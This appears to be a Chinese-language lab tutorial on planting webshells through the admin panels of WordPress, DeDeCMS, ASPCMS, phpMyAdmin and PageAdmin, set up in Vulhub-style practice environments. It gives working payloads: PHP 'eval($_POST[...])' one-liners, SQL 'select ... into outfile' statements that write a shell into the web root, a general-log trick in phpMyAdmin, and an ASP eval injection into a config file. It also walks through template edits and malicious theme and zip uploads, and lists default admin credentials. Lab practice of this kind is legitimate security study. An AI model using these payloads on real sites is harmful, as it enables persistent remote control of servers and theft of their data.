常见的cms框架的webshell方法

⼀：WordPress

后台修改模板拿WebShell

进⼊Vulhub靶场并执⾏以下命令开启靶场；在浏览器中访问并安装

#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d

#靶场地址

word pass测试 ‹ Log In

思路是修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell；登陆WP后点击 【外
观】 --》 【编辑】 --》 404.php

在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮

访问以下连接即可获取WebShell

#拼接路径
/wp-content/themes/twentyfifteen/404.php

http://8.140.254.245:8080//wp-content/themes/twentyfifteen/404.php

上传主题拿WebShell

接着上⼀个环境使⽤...将带有后⻔的⽂件加⼊到主题中并将主题压缩为ZIP⽂件...点击 【外
观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】

我们先在网上下载一个主题

https://downloads.wordpress.org/theme/pedro.2.0.5.zip

然后写一个一句话木马1.php放入到我们下载的压缩包里面

安装成功后访问主题下的⽹站后⻔⽂件.

#拼接路径
/wp-content/themes/pedro/1.php

⼆：DeDeCMS

通过⽂件管理器上传WebShell

访问⽬标靶场其思路为 dedecms 后台可以直接上传任意⽂件，可以通过⽂件管理器上传
php⽂件获取webshell...

前台
http://172.16.2.32/
#后台
http://172.16.2.32/dede
#信息
username:admin
password:admin

登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代
码上传...OK

上传我们的一句话木马

访问上传成功后的⽂件并使⽤蚁剑连接测试...

修改模板⽂件拿WebShell

与WPCMS类似，直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 -
-》 【index.htm】 --> 【修改】 在⽂件修改中添加⼀句话代码....如下

点击 【⽣成】 --》 【更新主⻚HTML】 --》将主⻚位置修改为 【../index.php 】--》
点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化...

后台任意命令执⾏拿WebShell

点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添
加⼀句话代码--》点击 【确定】

然后访问我们的广告用蚁剑连接

通过后台sql命令执⾏拿webshell

.访问系统---sql命令⾏⼯具---执⾏ select @@ basedir，获取mysql路径，由此瑞测⽹站绝对路径

into outfile写⼊⼀句话⽊⻢

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php’

如果生成不了文件可以看看数据库的配置文件my.ini中的secure_file_priv=的值是否为空

然后访问我们生成的php文件用蚁剑连接

三：ASPCMS

后台修改配置⽂件拿Shell

访问以下地址为ASPCMS...并登陆到后台（这⾥注意在搭建站点的时候注意权限问题）

http://172.16.2.32:8080/admin_aspcms

#账户密码
username:admin
password:123456

点击 【扩展功能】 --》 【幻灯⽚设置】 --》点击 【保存】 --》开启代理进⾏抓包

在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进⾏发包查看被修改的asp
⽂件内容...

影响⽂件
/config/AspCms_Config.asp

#字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a

访问以下地址进⾏连接

http://172.16.2.32:8080/config/aspcms_config.asp

四：PhPMyadmin

导⼊导出拿WebShell

通过SQL语句拿webshell ⽤ into outfile 把后⻔写到⽹站⽬录上。

1.⾸先判断mysql位置
select @@datadir

2.猜测web路径
猜测web路径：D:\phpstudy_pro\www

3.写webshell
select "<?php @eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/WWW/phpMyAdmin4.8.5/2.php';

然后访问我们生成的php文件用蚁剑连接

界⾯图像化GetShell

phpmyadmin管理台
变量：⽇志 搜索：gen
log:on
file:D:/phpstudy_pro/WWW/phpMyAdmin4.8.5/1.php
sql:
select "<?php eval($_POST[cmd]);?>";

五：Pageadmin

上传模块拿WebShell

访问 pageadmin 在后台可以上传模板，把webshell打包成zip上传模板，系统会⾃动解压，
成功会在后台存在后⻔，访问即可获取webshell 。 点击【应⽤】--》【 插件安装】--》【 上传⽂件

这⾥因为不是授权版本，⽆法上传，如果有授权版本的话就可以成功上传，上传后系统会⾃动解压，直
接访问shell地址就可以了：/Templates/1/1.aspx

上传⽂件解压拿WebShell

点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】--》 【解压】

写一个asp的命令

访问我们上传的文件